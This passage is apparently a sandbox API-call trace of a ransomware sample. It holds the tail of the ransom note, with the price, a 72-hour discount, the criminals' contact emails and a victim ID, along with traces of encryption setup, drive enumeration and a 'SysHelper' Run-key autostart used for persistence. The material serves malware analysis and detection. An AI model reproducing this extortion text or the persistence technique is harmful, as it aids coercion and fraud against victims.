worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned 1076 [0124.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1070) returned 0x32653f8 [0124.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3264388 | out: hHeap=0x620000) returned 1 [0124.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32634a8 | out: hHeap=0x620000) returned 1 [0124.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x28) returned 0x324bae0 [0124.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x321bd20 [0124.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x321bf88 [0124.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x325e1a0 [0124.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x325e408 [0124.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x325e670 [0124.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x325e8d8 [0124.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x325eb40 [0124.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x325eda8 [0124.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x325f010 [0124.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x325f278 [0124.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80a) returned 0x32634a8 [0124.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d860, cbMultiByte=-1, lpWideCharStr=0x32634a8, cchWideChar=1029 | out: lpWideCharStr=".sqpc") returned 6 [0124.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3264388 [0124.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32634a8 | out: hHeap=0x620000) returned 1 [0124.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3254c40 [0124.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320fc38 [0124.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x31fcfc0 | out: hHeap=0x620000) returned 1 [0124.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c300 [0124.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x48) returned 0x323dbb0 [0124.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320fc38 | out: hHeap=0x620000) returned 1 [0124.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x6ff348 [0124.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x6ff3b0 [0124.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x323dbb0 | out: hHeap=0x620000) returned 1 [0124.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x32231c8 [0124.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e368 [0124.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6ff3b0 | out: hHeap=0x620000) returned 1 [0124.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c358 [0124.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c3b0 [0124.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd8) returned 0x70d2d8 [0124.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e368 | out: hHeap=0x620000) returned 1 [0124.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3223180 [0124.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3254c68 [0124.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c408 [0124.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x138) returned 0x6ed148 [0124.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70d2d8 | out: hHeap=0x620000) returned 1 [0124.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x6ff3b0 [0124.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3223210 [0124.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c460 [0124.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c4b8 [0124.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c8) returned 0x3258c30 [0124.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6ed148 | out: hHeap=0x620000) returned 1 [0124.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3223258 [0124.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3220268 | out: hHeap=0x620000) returned 1 [0124.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3254c40 | out: hHeap=0x620000) returned 1 [0124.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c300 | out: hHeap=0x620000) returned 1 [0124.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6ff348 | out: hHeap=0x620000) returned 1 [0124.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32231c8 | out: hHeap=0x620000) returned 1 [0124.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c358 | out: hHeap=0x620000) returned 1 [0124.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c3b0 | out: hHeap=0x620000) returned 1 [0124.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3223180 | out: hHeap=0x620000) returned 1 [0124.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3254c68 | out: hHeap=0x620000) returned 1 [0124.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c408 | out: hHeap=0x620000) returned 1 [0124.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6ff3b0 | out: hHeap=0x620000) returned 1 [0124.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3223210 | out: hHeap=0x620000) returned 1 [0124.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c460 | out: hHeap=0x620000) returned 1 [0124.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c4b8 | out: hHeap=0x620000) returned 1 [0124.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3223258 | out: hHeap=0x620000) returned 1 [0124.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3258c30 | out: hHeap=0x620000) returned 1 [0124.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x28) returned 0x324bb40 [0124.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x325f4e0 [0124.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x325f748 [0124.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x325f9b0 [0124.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x325fc18 [0124.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x325fe80 [0124.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3266488 [0124.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x32666f0 [0124.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3266958 [0124.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3266bc0 [0124.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3266e28 [0124.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x31da518 [0124.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x130) returned 0x6ed148 [0124.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x31da518 | out: hHeap=0x620000) returned 1 [0124.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1d0) returned 0x3264ba0 [0124.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6ed148 | out: hHeap=0x620000) returned 1 [0124.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2b7) returned 0x3264d78 [0124.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3264ba0 | out: hHeap=0x620000) returned 1 [0124.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x412) returned 0x32634a8 [0124.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3264d78 | out: hHeap=0x620000) returned 1 [0124.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x61a) returned 0x3264ba0 [0124.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32634a8 | out: hHeap=0x620000) returned 1 [0124.045] GetUserNameW (in: lpBuffer=0x18da60, pcbBuffer=0x18d8d4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d8d4) returned 1 [0125.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x590) returned 0x3291930 [0125.534] GetLastError () returned 0x0 [0125.544] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d5c8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.544] GetLastError () returned 0x3 [0125.544] GetLastError () returned 0x3 [0125.544] CreateDirectoryW (lpPathName="C:\\SystemID" (normalized: "c:\\systemid"), lpSecurityAttributes=0x0) returned 1 [0125.545] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x18d5c8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x688 [0125.545] GetFileType (hFile=0x688) returned 0x1 [0125.545] GetLastError () returned 0x0 [0125.553] CreateFileW (lpFileName="I:\\5d2860c89d774.jpg" (normalized: "i:\\5d2860c89d774.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.553] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0125.553] RegisterClassExW (param_1=0x18d840) returned 0xc16d [0125.553] CreateWindowExW (dwExStyle=0x0, lpClassName="LPCWSTRszWindowClass", lpWindowName="LPCWSTRszTitle", dwStyle=0xcf0000, X=-2147483648, Y=0, nWidth=-2147483648, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x5011c [0125.554] NtdllDefWindowProc_W () returned 0x0 [0125.554] NtdllDefWindowProc_W () returned 0x1 [0125.556] NtdllDefWindowProc_W () returned 0x0 [0126.071] NtdllDefWindowProc_W () returned 0x0 [0126.072] ShowWindow (hWnd=0x5011c, nCmdShow=0) returned 0 [0126.072] UpdateWindow (hWnd=0x5011c) returned 1 [0126.072] GetLogicalDrives () returned 0x4 [0126.072] SetErrorMode (uMode=0x1) returned 0x0 [0126.072] PathFileExistsA (pszPath="C:\\") returned 1 [0126.072] SetErrorMode (uMode=0x0) returned 0x1 [0126.072] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0126.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x806) returned 0x32970c0 [0126.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d7f8, cbMultiByte=-1, lpWideCharStr=0x32970c0, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0126.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x32978d0 [0126.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32970c0 | out: hHeap=0x620000) returned 1 [0126.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x31fe5a0 [0126.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32978d0 | out: hHeap=0x620000) returned 1 [0126.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x31fe5a0 | out: hHeap=0x620000) returned 1 [0126.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x31fe5a0 [0126.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x32754b0 [0126.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8ec) returned 0x32970c0 [0126.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x32979b8 [0126.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x32b5e98 [0126.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1070) returned 0x3292fc0 [0126.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b0e8 [0126.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x32981d0 [0126.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x660) returned 0x32989e8 [0126.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9a84ba8 [0126.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9a85430 [0126.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9a85cb8 [0126.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9a86540 [0126.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9a86dc8 [0126.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3294038 [0126.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9a87650 [0126.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9a87ed8 [0126.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3294880 [0126.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x9a94b90 [0126.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x9a953f8 [0126.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9a88760 [0126.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9a88fe8 [0126.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9a95c60 [0126.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9a964a8 [0126.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9a89870 [0126.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9a8a0f8 [0126.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9a8a980 [0126.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9a8b208 [0126.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9a8ba90 [0126.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9a8c318 [0126.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9a8cba0 [0126.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9a8d428 [0126.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9a8dcb0 [0126.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9a8e538 [0126.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x9a96cf0 [0126.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x9a97558 [0126.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9a8edc0 [0126.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9a8f648 [0126.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9a8fed0 [0126.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9a97dc0 [0126.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9a98608 [0126.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9a90758 [0126.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9a90fe0 [0126.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9a91868 [0126.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9a920f0 [0126.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9a92978 [0126.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9a93200 [0126.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9a93a88 [0126.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9a98e68 [0126.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9a996f0 [0126.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x9aa8e50 [0126.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x9aa96b8 [0126.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9a99f78 [0126.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9a9a800 [0126.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9a9b088 [0126.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aa9f20 [0126.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9a9b910 [0126.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9a9c198 [0126.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9a9ca20 [0126.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9a9d2a8 [0126.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9a9db30 [0126.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9a9e3b8 [0126.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9a9ec40 [0126.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9a9f4c8 [0126.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9a9fd50 [0126.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aa05d8 [0126.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x9aaa768 [0126.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x9aaafd0 [0126.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aa0e60 [0126.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aa16e8 [0126.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aa1f70 [0126.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aa27f8 [0126.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aa3080 [0126.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aa3908 [0126.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aa4190 [0126.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aa4a18 [0126.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aa52a0 [0126.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x3225fd8 [0126.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aa5b28 [0126.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aab838 [0126.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aac050 [0126.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aac868 [0126.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aa63b0 [0126.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aa6c38 [0126.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aa74c0 [0126.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aa7d48 [0126.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b150 [0126.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aad098 [0126.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aad920 [0126.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aae1a8 [0126.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaea30 [0126.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x110) returned 0x327eee8 [0126.081] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41f130, lpParameter=0x32970c8, dwCreationFlags=0x0, lpThreadId=0x32754b8 | out: lpThreadId=0x32754b8*=0x360) returned 0x690 [0126.082] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41fd80, lpParameter=0x529238, dwCreationFlags=0x0, lpThreadId=0x529230 | out: lpThreadId=0x529230*=0xabc) returned 0x694 [0126.082] GetMessageW (in: lpMsg=0x18d9f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18d9f0) returned 1 [0139.341] NtdllDefWindowProc_W () returned 0x0 [0139.342] NtdllDefWindowProc_W () returned 0x0 [0139.364] NtdllDefWindowProc_W () returned 0x0 [0139.364] NtdllDefWindowProc_W () returned 0x0 [0139.365] NtdllDefWindowProc_W () returned 0x0 [0139.365] NtdllDefWindowProc_W () returned 0x0 [0139.366] NtdllDefWindowProc_W () returned 0x0 [0139.366] NtdllDefWindowProc_W () returned 0x1 [0139.369] NtdllDefWindowProc_W () returned 0x0 [0143.687] NtdllDefWindowProc_W () returned 0x0 [0144.628] NtdllDefWindowProc_W () returned 0x0 [0144.628] NtdllDefWindowProc_W () returned 0x0 [0144.629] NtdllDefWindowProc_W () returned 0x3 [0144.629] TranslateMessage (lpMsg=0x18d9f0) returned 0 [0144.629] DispatchMessageW (lpMsg=0x18d9f0) returned 0x0 [0144.629] GetMessageW (in: lpMsg=0x18d9f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18d9f0) returned 0 [0144.633] NtdllDefWindowProc_W () returned 0x2 [0144.634] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18c108 | out: phkResult=0x18c108*=0x718) returned 0x0 [0144.634] RegQueryValueExW (in: hKey=0x718, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18c104, lpData=0x18a830, lpcbData=0x18c0e8*=0x400 | out: lpType=0x18c104*=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\\585939.exe\" --AutoStart", lpcbData=0x18c0e8*=0xd4) returned 0x0 [0144.634] RegCloseKey (hKey=0x718) returned 0x0 [0144.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x328a098 [0144.634] lstrlenA (lpString="\" --AutoStart") returned 13 [0144.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x32263c0 [0144.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x328a098 | out: hHeap=0x620000) returned 1 [0144.634] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\\585939.exe") returned 1 [0144.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32263c0 | out: hHeap=0x620000) returned 1 [0144.635] IsWindow (hWnd=0x5011c) returned 1 [0144.635] DestroyWindow (hWnd=0x5011c) returned 1 [0144.635] NtdllDefWindowProc_W () returned 0x0 [0144.636] NtdllDefWindowProc_W () returned 0x1 [0144.638] NtdllDefWindowProc_W () returned 0x0 [0144.638] NtdllDefWindowProc_W () returned 0x0 [0144.638] NtdllDefWindowProc_W () returned 0x0 [0144.638] NtdllDefWindowProc_W () returned 0x0 [0144.638] NtdllDefWindowProc_W () returned 0x0 [0144.639] PostQuitMessage (nExitCode=0) [0145.159] NtdllDefWindowProc_W () returned 0x0 [0145.160] CloseHandle (hObject=0x5d0) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x31fe5a0 | out: hHeap=0x620000) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327cfe8 | out: hHeap=0x620000) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d010 | out: hHeap=0x620000) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d038 | out: hHeap=0x620000) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d060 | out: hHeap=0x620000) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d088 | out: hHeap=0x620000) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d0b0 | out: hHeap=0x620000) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3271d68 | out: hHeap=0x620000) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3271da0 | out: hHeap=0x620000) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d0d8 | out: hHeap=0x620000) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d100 | out: hHeap=0x620000) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d128 | out: hHeap=0x620000) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, 